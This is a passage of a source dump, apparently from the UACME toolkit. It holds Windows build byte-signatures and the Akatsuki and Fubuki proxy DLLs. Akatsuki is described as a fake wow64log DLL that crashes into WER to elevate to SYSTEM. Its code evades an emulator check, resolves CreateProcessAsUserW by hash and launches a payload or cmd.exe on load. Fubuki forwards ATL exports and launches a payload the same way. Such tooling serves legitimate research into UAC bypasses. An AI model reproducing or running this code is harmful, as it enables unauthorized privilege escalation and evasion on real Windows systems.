0x44, 0x8B, 0xC9, 0x4C, 0x8B, 0xC6, 0x49, 0x8B, 0xD7
};
// mov r8, rdi
// mov rdx, rsi
// mov ecx, r9d
// call UserAssocSet
static BYTE UserAssocSet_19042[] = {
0x4C, 0x8B, 0xC7, 0x48, 0x8B, 0xD6, 0x41, 0x8B, 0xC9
};
// mov r8, rdi
// mov rdx, rbp
// mov ecx, eax
// call UserAssocSet
static BYTE UserAssocSet_19043_v1023[] = {
0x4C, 0x8B, 0xC7, 0x48, 0x8B, 0xD5, 0x8B, 0xC8
};
// mov r8, rsi
// mov rdx, r14
// mov eax, ecx
// call UserAssocSet
static BYTE UserAssocSet_22000[] = {
0x4C, 0x8B, 0xC6, 0x49, 0x8B, 0xD6, 0x8B, 0xC8
};
// mov r9d, ecx
// mov r8, rdi
// mov rdx, r14
// call UserAssocSet
static BYTE UserAssocSet_22621[] = {
0x44, 0x8B, 0xC9, 0x4C, 0x8B, 0xC7, 0x49, 0x8B, 0xD6
};
// mov r8, rsi
// mov rdx, r15
// lea ecx, [r9 + 2]
// call UserAssocSet
static BYTE UserAssocSet_26100[] = {
0x4C, 0x8B, 0xC6, 0x49, 0x8B, 0xD7, 0x41, 0x8D, 0x49, 0x02
};
//
// End of UserAssocSet patterns.
//
//
// Windows 7 SP1 7601
//
USER_ASSOC_PATTERN UAS_7601 = { UserAssocSet_7601, sizeof(UserAssocSet_7601) };
PVOID UAS_PATTERN_TABLE_7601[] = { &UAS_7601 };
USER_ASSOC_SIGNATURE UAS_SIG_7601 = { NT_WIN7_SP1, NT_WIN7_SP1, RTL_NUMBER_OF(UAS_PATTERN_TABLE_7601), &UAS_PATTERN_TABLE_7601 };
//
// Windows 8 (9600)
//
USER_ASSOC_PATTERN UAS_9600 = { UserAssocSet_9600, sizeof(UserAssocSet_9600) };
PVOID UAS_PATTERN_TABLE_9600[] = { &UAS_9600 };
USER_ASSOC_SIGNATURE UAS_SIG_9600 = { NT_WIN8_BLUE, NT_WIN8_BLUE, RTL_NUMBER_OF(UAS_PATTERN_TABLE_9600), &UAS_PATTERN_TABLE_9600 };
//
// Windows 10 1607 (14393)
//
USER_ASSOC_PATTERN UAS_14393 = { UserAssocSet_14393, sizeof(UserAssocSet_14393) };
PVOID UAS_PATTERN_TABLE_14393[] = { &UAS_14393 };
USER_ASSOC_SIGNATURE UAS_SIG_14393 = { NT_WIN10_REDSTONE1, NT_WIN10_REDSTONE1, RTL_NUMBER_OF(UAS_PATTERN_TABLE_14393), &UAS_PATTERN_TABLE_14393 };
//
// Windows 10 1809 (17763)
//
USER_ASSOC_PATTERN UAS_17763_1554 = { UserAssocSet_17763_v1554, sizeof(UserAssocSet_17763_v1554) };
USER_ASSOC_PATTERN UAS_17763_1728 = { UserAssocSet_17763_v1728, sizeof(UserAssocSet_17763_v1728) };
USER_ASSOC_PATTERN UAS_17763_1971 = { UserAssocSet_17763_v1971, sizeof(UserAssocSet_17763_v1971) };
PVOID UAS_PATTERN_TABLE_17763[] = { &UAS_17763_1554, &UAS_17763_1728, &UAS_17763_1971 };
USER_ASSOC_SIGNATURE UAS_SIG_17763 = { NT_WIN10_REDSTONE5, NT_WIN10_REDSTONE5, RTL_NUMBER_OF(UAS_PATTERN_TABLE_17763), &UAS_PATTERN_TABLE_17763 };
//
// Windows 10 1903 (18362)
//
USER_ASSOC_PATTERN UAS_18362 = { UserAssocSet_18362, sizeof(UserAssocSet_18362) };
USER_ASSOC_PATTERN UAS_18362_1350 = { UserAssocSet_18362_v2, sizeof(UserAssocSet_18362_v2) };
PVOID UAS_PATTERN_TABLE_18362[] = { &UAS_18362, &UAS_18362_1350 };
USER_ASSOC_SIGNATURE UAS_SIG_18362 = { NT_WIN10_19H1, NT_WIN10_19H1, RTL_NUMBER_OF(UAS_PATTERN_TABLE_18362), &UAS_PATTERN_TABLE_18362 };
//
// Windows 10 1909 (18363)
//
USER_ASSOC_PATTERN UAS_18363 = { UserAssocSet_18363, sizeof(UserAssocSet_18363) };
PVOID UAS_PATTERN_TABLE_18363[] = { &UAS_18363, &UAS_18362_1350 };
USER_ASSOC_SIGNATURE UAS_SIG_18363 = { NT_WIN10_19H2, NT_WIN10_19H2, RTL_NUMBER_OF(UAS_PATTERN_TABLE_18363), &UAS_PATTERN_TABLE_18363 };
//
// Windows 10 2004 (19041)
//
USER_ASSOC_PATTERN UAS_19041 = { UserAssocSet_19041, sizeof(UserAssocSet_19041) };
USER_ASSOC_PATTERN UAS_19042_789 = { UserAssocSet_19042, sizeof(UserAssocSet_19042) }; //same as for 19042
PVOID UAS_PATTERN_TABLE_19041[] = { &UAS_19041, &UAS_19042_789 };
USER_ASSOC_SIGNATURE UAS_SIG_19041 = { NT_WIN10_20H1, NT_WIN10_20H1, RTL_NUMBER_OF(UAS_PATTERN_TABLE_19041), &UAS_PATTERN_TABLE_19041 };
//
// Windows 10 2009 (19042/19043/19044)
//
USER_ASSOC_PATTERN UAS_19043 = { UserAssocSet_19043_v1023, sizeof(UserAssocSet_19043_v1023) };
PVOID UAS_PATTERN_TABLE_19042_19043[] = { &UAS_19042_789, &UAS_19043 };
USER_ASSOC_SIGNATURE UAS_SIG_19042_19043 = { NT_WIN10_20H2, NT_WIN10_21H2, RTL_NUMBER_OF(UAS_PATTERN_TABLE_19042_19043), &UAS_PATTERN_TABLE_19042_19043 };
// Windows 11 21H2 (22000)
USER_ASSOC_PATTERN UAS_22000 = { UserAssocSet_22000, sizeof(UserAssocSet_22000) };
PVOID UAS_PATTERN_TABLE_22000[] = { &UAS_22000 };
USER_ASSOC_SIGNATURE UAS_SIG_22000 = { NT_WIN11_21H2 , NT_WIN11_21H2, RTL_NUMBER_OF(UAS_PATTERN_TABLE_22000), &UAS_PATTERN_TABLE_22000 };
//
// Windows 11 22H2-23H2 (22621/22631)
//
USER_ASSOC_PATTERN UAS_22621 = { UserAssocSet_22621, sizeof(UserAssocSet_22621) };
PVOID UAS_PATTERN_TABLE_22621[] = { &UAS_22621 };
USER_ASSOC_SIGNATURE UAS_SIG_22621 = { NT_WIN11_22H2, NT_WIN11_23H2, RTL_NUMBER_OF(UAS_PATTERN_TABLE_22621), &UAS_PATTERN_TABLE_22621 };
//
// Windows 11 24H2 (26100+)
//
USER_ASSOC_PATTERN UAS_26100 = { UserAssocSet_26100, sizeof(UserAssocSet_26100) };
PVOID UAS_PATTERN_TABLE_26100[] = { &UAS_26100 };
USER_ASSOC_SIGNATURE UAS_SIG_26100 = { NT_WIN11_24H2, NT_WIN11_24H2, RTL_NUMBER_OF(UAS_PATTERN_TABLE_26100), &UAS_PATTERN_TABLE_26100 };
================================================
FILE: Source/Akatsuki/Akatsuki.vcxproj
================================================
Debug
x64
ReleaseInternal
x64
Release
x64
{07EF7652-1C2D-478B-BB4B-F9560695A387}
Win32Proj
Akatsuki
10.0
DynamicLibrary
true
v145
Unicode
false
DynamicLibrary
false
v145
true
Unicode
false
DynamicLibrary
false
v145
true
Unicode
false
true
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
$(ProjectName)64
SecurityRules.ruleset
false
false
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
$(ProjectName)64
false
AllRules.ruleset
false
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
$(ProjectName)64
false
SecurityRules.ruleset
Level4
Disabled
_DEBUG;_WINDOWS;_USRDLL;AKATSUKI_EXPORTS;%(PreprocessorDefinitions)
CompileAsC
$(SolutionDir)
Windows
true
DllMain
6.0
export.def
Level4
MaxSpeed
true
true
NDEBUG;_WINDOWS;_USRDLL;AKATSUKI_EXPORTS;%(PreprocessorDefinitions)
false
CompileAsC
$(SolutionDir)
Windows
true
true
false
DllMain
true
6.0
export.def
Level4
MaxSpeed
true
true
NDEBUG;_WINDOWS;_USRDLL;AKATSUKI_EXPORTS;%(PreprocessorDefinitions)
false
CompileAsC
$(SolutionDir)
Windows
true
true
false
DllMain
true
6.0
export.def
\Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\Akatsuki64.dll
================================================
FILE: Source/Akatsuki/Akatsuki.vcxproj.filters
================================================
{4FC737F1-C7A5-4376-A066-2A32D752A2FF}
cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
{93995380-89BD-4b04-88EB-625FBE52EBFB}
h;hh;hpp;hxx;hm;inl;inc;xsd
{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
{f47eeec1-a71b-4ee9-b4eb-12077afe72ca}
Source Files
minirtl
minirtl
minirtl
minirtl
minirtl
minirtl
minirtl
minirtl
minirtl
minirtl
minirtl
minirtl
minirtl
Source Files
Source Files
minirtl
Header Files
Header Files
Header Files
Header Files
Source Files
Resource Files
================================================
FILE: Source/Akatsuki/Akatsuki.vcxproj.user
================================================
================================================
FILE: Source/Akatsuki/dllmain.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016 - 2022
*
* TITLE: DLLMAIN.C
*
* VERSION: 3.61
*
* DATE: 22 Jun 2022
*
* Proxy dll entry point, Akatsuki.
* Special dll for wow64 logger method.
*
* WARNING: real wow64log must have native subsystem and only ntdll export.
* This one will force crash and propagate to WER process elevating to NTAuthority/System.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#if !defined UNICODE
#error ANSI build is not supported
#endif
#include "shared\shared.h"
#include "shared\libinc.h"
#define LoadedMsg TEXT("Akatsuki lock and loaded")
HANDLE g_SyncMutant = NULL;
UACME_PARAM_BLOCK g_SharedParams;
/*
* DummyFunc
*
* Purpose:
*
* Stub for fake exports.
*
*/
VOID WINAPI DummyFunc(
VOID
)
{
}
/*
* DbgDumpRuntimeInfo
*
* Purpose:
*
* Dump runtime info to the file, this routine is only for debug builds.
*
*/
VOID DbgDumpRuntimeInfo()
{
HANDLE hFile = INVALID_HANDLE_VALUE;
WCHAR szReportName[MAX_PATH * 2];
WCHAR sysdir[MAX_PATH + 1];
DWORD cch;
LPWSTR lpText = NULL;
DWORD bytesIO;
WCHAR ch;
cch = ucmExpandEnvironmentStrings(L"%temp%\\", sysdir, MAX_PATH);
if ((cch != 0) && (cch < MAX_PATH)) {
_strcpy(szReportName, sysdir);
_strcat(szReportName, TEXT("report_"));
ultostr(GetCurrentProcessId(), _strend(szReportName));
_strcat(szReportName, TEXT(".txt"));
hFile = CreateFile(szReportName, GENERIC_ALL, 0, NULL, CREATE_ALWAYS, 0, NULL);
if (hFile != INVALID_HANDLE_VALUE) {
ch = (WCHAR)0xFEFF;
WriteFile(hFile, &ch, sizeof(WCHAR), &bytesIO, NULL);
lpText = ucmQueryRuntimeInfo(TRUE);
if (lpText) {
WriteFile(hFile, lpText, (DWORD)(_strlen(lpText) * sizeof(WCHAR)), &bytesIO, NULL);
ucmDestroyRuntimeInfo(lpText);
}
CloseHandle(hFile);
}
}
}
#define Hash_CreateProcessAsUserW 0xb75be93c
/*
* InitFunctionPtr
*
* Purpose:
*
* Retrieve required function ptr.
*
*/
PVOID InitFunctionPtr(
VOID
)
{
UNICODE_STRING usKernel = RTL_CONSTANT_STRING(L"kernel32.dll");
UNICODE_STRING usAdvapi = RTL_CONSTANT_STRING(L"advapi32.dll");
NTSTATUS ntStatus;
PVOID ImageBase = NULL, dummy;
ntStatus = LdrLoadDll(NULL, NULL, &usKernel, &dummy);
if (NT_SUCCESS(ntStatus)) {
ntStatus = LdrGetDllHandleEx(LDR_GET_DLL_HANDLE_EX_UNCHANGED_REFCOUNT,
NULL, NULL, &usAdvapi, &ImageBase);
if (!NT_SUCCESS(ntStatus)) {
ntStatus = LdrLoadDll(NULL, NULL, &usAdvapi, &ImageBase);
}
if (NT_SUCCESS(ntStatus)) {
return ucmGetProcedureAddressByHash(ImageBase, Hash_CreateProcessAsUserW);
}
}
return NULL;
}
/*
* DefaultPayload
*
* Purpose:
*
* Process parameter if exist or start cmd.exe and exit immediatelly.
*
*/
VOID DefaultPayload(
VOID
)
{
BOOL bSharedParamsReadOk;
UINT ExitCode = 0;
PWSTR lpParameter;
ULONG cbParameter;
BOOL bIsLocalSystem = FALSE;
ULONG SessionId;
PFNCREATEPROCESSASUSERW pCreateProcessAsUser;
if (!NT_SUCCESS(ucmCreateSyncMutant(&g_SyncMutant))) {
RtlExitUserProcess(STATUS_SUCCESS);
return;
}
//
// Read shared params block.
//
RtlSecureZeroMemory(&g_SharedParams, sizeof(g_SharedParams));
bSharedParamsReadOk = ucmReadSharedParameters(&g_SharedParams);
if (bSharedParamsReadOk) {
lpParameter = g_SharedParams.szParameter;
cbParameter = (ULONG)(_strlen(g_SharedParams.szParameter) * sizeof(WCHAR));
SessionId = g_SharedParams.SessionId;
}
else {
lpParameter = NULL;
cbParameter = 0UL;
SessionId = 0;
}
ucmIsLocalSystem(&bIsLocalSystem);
pCreateProcessAsUser = (PFNCREATEPROCESSASUSERW)InitFunctionPtr();
if (pCreateProcessAsUser) {
ExitCode = (ucmLaunchPayload2(
pCreateProcessAsUser,
bIsLocalSystem,
SessionId,
lpParameter,
cbParameter) != FALSE);
}
//
// Notify Akagi.
//
if (bSharedParamsReadOk) {
ucmSetCompletion(g_SharedParams.szSignalObject);
}
ucmSleep(5000);
NtClose(g_SyncMutant);
RtlExitUserProcess(ExitCode);
}
/*
* DllMain
*
* Purpose:
*
* Proxy dll entry point.
*
*/
BOOL WINAPI DllMain(
_In_ HINSTANCE hinstDLL,
_In_ DWORD fdwReason,
_In_ LPVOID lpvReserved
)
{
UNREFERENCED_PARAMETER(hinstDLL);
UNREFERENCED_PARAMETER(lpvReserved);
ucmDbgMsg(LoadedMsg);
if (wdIsEmulatorPresent() == STATUS_NEEDS_REMEDIATION)
RtlExitUserProcess('Foff');
if (fdwReason == DLL_PROCESS_ATTACH) {
LdrDisableThreadCalloutsForDll(hinstDLL);
DefaultPayload();
}
return TRUE;
}
/*
* EntryPointExeMode
*
* Purpose:
*
* Entry point to be used in exe mode.
*
*/
VOID WINAPI EntryPointExeMode(
VOID
)
{
BOOL IsDll = RtlImageNtHeader(GetModuleHandle(NULL))->FileHeader.Characteristics & IMAGE_FILE_DLL;
if (!IsDll) {
if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED) {
RtlExitUserProcess('foff');
}
DefaultPayload();
}
}
================================================
FILE: Source/Akatsuki/export.def
================================================
EXPORTS
Wow64LogSystemService = DummyFunc
Wow64LogInitialize = DummyFunc
Wow64LogTerminate = DummyFunc
Wow64LogMessageArgList = EntryPointExeMode
================================================
FILE: Source/Akatsuki/resource.h
================================================
//{{NO_DEPENDENCIES}}
// Microsoft Visual C++ generated include file.
// Used by version.rc
// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE 101
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1001
#define _APS_NEXT_SYMED_VALUE 101
#endif
#endif
================================================
FILE: Source/Fubuki/atldll.h
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2023
*
* TITLE: ATLDLL.H
*
* VERSION: 3.64
*
* DATE: 04 Feb 2023
*
* ATL forwarded import.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
#pragma comment(linker, " /EXPORT:AtlAdvise=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlAdvise,@10")
#pragma comment(linker, " /EXPORT:AtlAxAttachControl=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlAxAttachControl,@41")
#pragma comment(linker, " /EXPORT:AtlAxCreateControl=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlAxCreateControl,@39")
#pragma comment(linker, " /EXPORT:AtlAxCreateControlEx=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlAxCreateControlEx,@40")
#pragma comment(linker, " /EXPORT:AtlAxCreateDialogA=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlAxCreateDialogA,@38")
#pragma comment(linker, " /EXPORT:AtlAxCreateDialogW=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlAxCreateDialogW,@37")
#pragma comment(linker, " /EXPORT:AtlAxDialogBoxA=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlAxDialogBoxA,@36")
#pragma comment(linker, " /EXPORT:AtlAxDialogBoxW=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlAxDialogBoxW,@35")
#pragma comment(linker, " /EXPORT:AtlAxGetControl=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlAxGetControl,@47")
#pragma comment(linker, " /EXPORT:AtlAxGetHost=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlAxGetHost,@48")
#pragma comment(linker, " /EXPORT:AtlAxWinInit=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlAxWinInit,@42")
#pragma comment(linker, " /EXPORT:AtlComPtrAssign=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlComPtrAssign,@30")
#pragma comment(linker, " /EXPORT:AtlComQIPtrAssign=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlComQIPtrAssign,@31")
#pragma comment(linker, " /EXPORT:AtlCreateTargetDC=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlCreateTargetDC,@26")
#pragma comment(linker, " /EXPORT:AtlDevModeW2A=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlDevModeW2A,@29")
#pragma comment(linker, " /EXPORT:AtlFreeMarshalStream=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlFreeMarshalStream,@12")
#pragma comment(linker, " /EXPORT:AtlGetObjectSourceInterface=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlGetObjectSourceInterface,@54")
#pragma comment(linker, " /EXPORT:AtlGetVersion=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlGetVersion,@34")
#pragma comment(linker, " /EXPORT:AtlHiMetricToPixel=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlHiMetricToPixel,@27")
#pragma comment(linker, " /EXPORT:AtlIPersistPropertyBag_Load=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlIPersistPropertyBag_Load,@52")
#pragma comment(linker, " /EXPORT:AtlIPersistPropertyBag_Save=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlIPersistPropertyBag_Save,@53")
#pragma comment(linker, " /EXPORT:AtlIPersistStreamInit_GetSizeMax=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlIPersistStreamInit_GetSizeMax,@60")
#pragma comment(linker, " /EXPORT:AtlIPersistStreamInit_Load=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlIPersistStreamInit_Load,@50")
#pragma comment(linker, " /EXPORT:AtlIPersistStreamInit_Save=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlIPersistStreamInit_Save,@51")
#pragma comment(linker, " /EXPORT:AtlInternalQueryInterface=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlInternalQueryInterface,@32")
#pragma comment(linker, " /EXPORT:AtlMarshalPtrInProc=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlMarshalPtrInProc,@13")
#pragma comment(linker, " /EXPORT:AtlModuleAddCreateWndData=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlModuleAddCreateWndData,@43")
#pragma comment(linker, " /EXPORT:AtlModuleAddTermFunc=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlModuleAddTermFunc,@58")
#pragma comment(linker, " /EXPORT:AtlModuleExtractCreateWndData=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlModuleExtractCreateWndData,@44")
#pragma comment(linker, " /EXPORT:AtlModuleGetClassObject=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlModuleGetClassObject,@15")
#pragma comment(linker, " /EXPORT:AtlModuleInit=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlModuleInit,@16")
#pragma comment(linker, " /EXPORT:AtlModuleLoadTypeLib=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlModuleLoadTypeLib,@56")
#pragma comment(linker, " /EXPORT:AtlModuleRegisterClassObjects=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlModuleRegisterClassObjects,@17")
#pragma comment(linker, " /EXPORT:AtlModuleRegisterServer=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlModuleRegisterServer,@18")
#pragma comment(linker, " /EXPORT:AtlModuleRegisterTypeLib=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlModuleRegisterTypeLib,@19")
#pragma comment(linker, " /EXPORT:AtlModuleRegisterWndClassInfoA=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlModuleRegisterWndClassInfoA,@46")
#pragma comment(linker, " /EXPORT:AtlModuleRegisterWndClassInfoW=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlModuleRegisterWndClassInfoW,@45")
#pragma comment(linker, " /EXPORT:AtlModuleRevokeClassObjects=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlModuleRevokeClassObjects,@20")
#pragma comment(linker, " /EXPORT:AtlModuleTerm=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlModuleTerm,@21")
#pragma comment(linker, " /EXPORT:AtlModuleUnRegisterTypeLib=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlModuleUnRegisterTypeLib,@55")
#pragma comment(linker, " /EXPORT:AtlModuleUnregisterServer=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlModuleUnregisterServer,@22")
#pragma comment(linker, " /EXPORT:AtlModuleUnregisterServerEx=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlModuleUnregisterServerEx,@57")
#pragma comment(linker, " /EXPORT:AtlModuleUpdateRegistryFromResourceD=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlModuleUpdateRegistryFromResourceD,@23")
#pragma comment(linker, " /EXPORT:AtlPixelToHiMetric=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlPixelToHiMetric,@28")
#pragma comment(linker, " /EXPORT:AtlRegisterClassCategoriesHelper=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlRegisterClassCategoriesHelper,@49")
#pragma comment(linker, " /EXPORT:AtlSetErrorInfo=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlSetErrorInfo,@25")
#pragma comment(linker, " /EXPORT:AtlSetErrorInfo2=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlSetErrorInfo2,@59")
#pragma comment(linker, " /EXPORT:AtlUnadvise=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlUnadvise,@11")
#pragma comment(linker, " /EXPORT:AtlUnmarshalPtr=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlUnmarshalPtr,@14")
#pragma comment(linker, " /EXPORT:AtlWaitWithMessageLoop=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlWaitWithMessageLoop,@24")
================================================
FILE: Source/Fubuki/dll.vcxproj
================================================
Debug
Win32
Debug
x64
ReleaseInternal
Win32
ReleaseInternal
x64
Release
Win32
Release
x64
{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}
Win32Proj
dll
Fubuki
10.0
DynamicLibrary
true
v145
Unicode
DynamicLibrary
true
v145
Unicode
false
DynamicLibrary
false
v145
true
Unicode
DynamicLibrary
false
v145
true
Unicode
DynamicLibrary
false
v145
true
Unicode
false
DynamicLibrary
false
v145
true
Unicode
false
true
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
false
SecurityRules.ruleset
$(ProjectName)32
false
true
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
$(ProjectName)64
SecurityRules.ruleset
false
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
true
AllRules.ruleset
$(ProjectName)32
false
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
true
AllRules.ruleset
$(ProjectName)32
false
false
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
$(ProjectName)64
AllRules.ruleset
false
false
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
$(ProjectName)64
SecurityRules.ruleset
false
Level4
Disabled
WIN32;_DEBUG;_WINDOWS;_USRDLL;DLL_EXPORTS;%(PreprocessorDefinitions)
Size
true
false
MultiThreadedDLL
false
false
CompileAsC
$(SolutionDir)
Windows
false
DllMain
6.0
export.def
Shell32.lib;%(AdditionalDependencies)
Level4
Disabled
WIN32;_DEBUG;_WINDOWS;_USRDLL;DLL_EXPORTS;%(PreprocessorDefinitions)
false
CompileAsC
$(SolutionDir)
Windows
true
DllMain
6.0
export.def
Shell32.lib;%(AdditionalDependencies)
Level4
MinSpace
true
true
WIN32;NDEBUG;_WINDOWS;_USRDLL;DLL_EXPORTS;%(PreprocessorDefinitions)
true
Size
true
false
MultiThreadedDLL
false
false
CompileAsC
None
$(SolutionDir)
Windows
true
true
DllMain
true
6.0
export.def
Shell32.lib;%(AdditionalDependencies)
No
UseLinkTimeCodeGeneration
Level4
MinSpace
true
true
WIN32;NDEBUG;_WINDOWS;_USRDLL;DLL_EXPORTS;%(PreprocessorDefinitions)
true
Size
true
false
MultiThreadedDLL
false
false
CompileAsC
None
$(SolutionDir)
Windows
true
true
DllMain
true
6.0
export.def
Shell32.lib;%(AdditionalDependencies)
No
UseLinkTimeCodeGeneration
\Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\Fubuki32.dll
Level4
MinSpace
true
true
WIN32;NDEBUG;_WINDOWS;_USRDLL;DLL_EXPORTS;%(PreprocessorDefinitions)
true
Size
true
false
CompileAsC
$(SolutionDir)
Windows
No
true
true
DllMain
true
6.0
export.def
Shell32.lib;%(AdditionalDependencies)
Level4
MinSpace
true
true
WIN32;NDEBUG;_WINDOWS;_USRDLL;DLL_EXPORTS;%(PreprocessorDefinitions)
true
Size
true
false
CompileAsC
$(SolutionDir)
Windows
No
true
true
DllMain
true
6.0
export.def
Shell32.lib;%(AdditionalDependencies)
\Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\Fubuki64.dll
================================================
FILE: Source/Fubuki/dll.vcxproj.filters
================================================
{4FC737F1-C7A5-4376-A066-2A32D752A2FF}
cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
{93995380-89BD-4b04-88EB-625FBE52EBFB}
h;hh;hpp;hxx;hm;inl;inc;xsd
{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
{04ee0fac-8cb1-42ba-8211-a3b0023677db}
Header Files
Header Files
Header Files
minirtl
Header Files
minirtl
Header Files
Header Files
Header Files
Header Files
Header Files
Header Files
Resource Files
Source Files
minirtl
minirtl
minirtl
minirtl
minirtl
minirtl
minirtl
minirtl
minirtl
minirtl
minirtl
Source Files
minirtl
Source Files
Source Files
Source Files
Source Files
================================================
FILE: Source/Fubuki/dll.vcxproj.user
================================================
WindowsLocalDebugger
================================================
FILE: Source/Fubuki/dllmain.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2014 - 2025
*
* TITLE: DLLMAIN.C
*
* VERSION: 3.69
*
* DATE: 07 Jul 2025
*
* Proxy dll entry point.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "fubuki.h"
UACME_PARAM_BLOCK g_SharedParams;
HANDLE g_SyncMutant = NULL;
/*
* DummyFunc
*
* Purpose:
*
* Stub for fake exports.
*
*/
VOID WINAPI DummyFunc(
VOID
)
{
}
/*
* DefaultPayload
*
* Purpose:
*
* Process parameter if exist or start cmd.exe and exit immediately.
*
*/
VOID DefaultPayload(
VOID
)
{
BOOL bSharedParamsReadOk;
UINT ExitCode;
PWSTR lpParameter;
ULONG cbParameter;
ucmDbgMsg(LoadedMsg);
//
// Read shared params block.
//
RtlSecureZeroMemory(&g_SharedParams, sizeof(g_SharedParams));
bSharedParamsReadOk = ucmReadSharedParameters(&g_SharedParams);
if (bSharedParamsReadOk) {
ucmDbgMsg(L"Fubuki, ucmReadSharedParameters OK\r\n");
lpParameter = g_SharedParams.szParameter;
cbParameter = (ULONG)(_strlen(g_SharedParams.szParameter) * sizeof(WCHAR));
}
else {
ucmDbgMsg(L"Fubuki, ucmReadSharedParameters Failed\r\n");
lpParameter = NULL;
cbParameter = 0UL;
}
ucmDbgMsg(L"Fubuki, before ucmLaunchPayload\r\n");
ExitCode = (ucmLaunchPayload(lpParameter, cbParameter) != FALSE);
ucmDbgMsg(L"Fubuki, after ucmLaunchPayload\r\n");
if (ExitCode == 0) {
ucmDbgMsg(L"Fubuki, ucmLaunchPayload failed\r\n");
}
//
// If this is default executable, show runtime info.
//
if ((lpParameter == NULL) || (cbParameter == 0)) {
if (g_SharedParams.AkagiFlag == AKAGI_FLAG_TANGO)
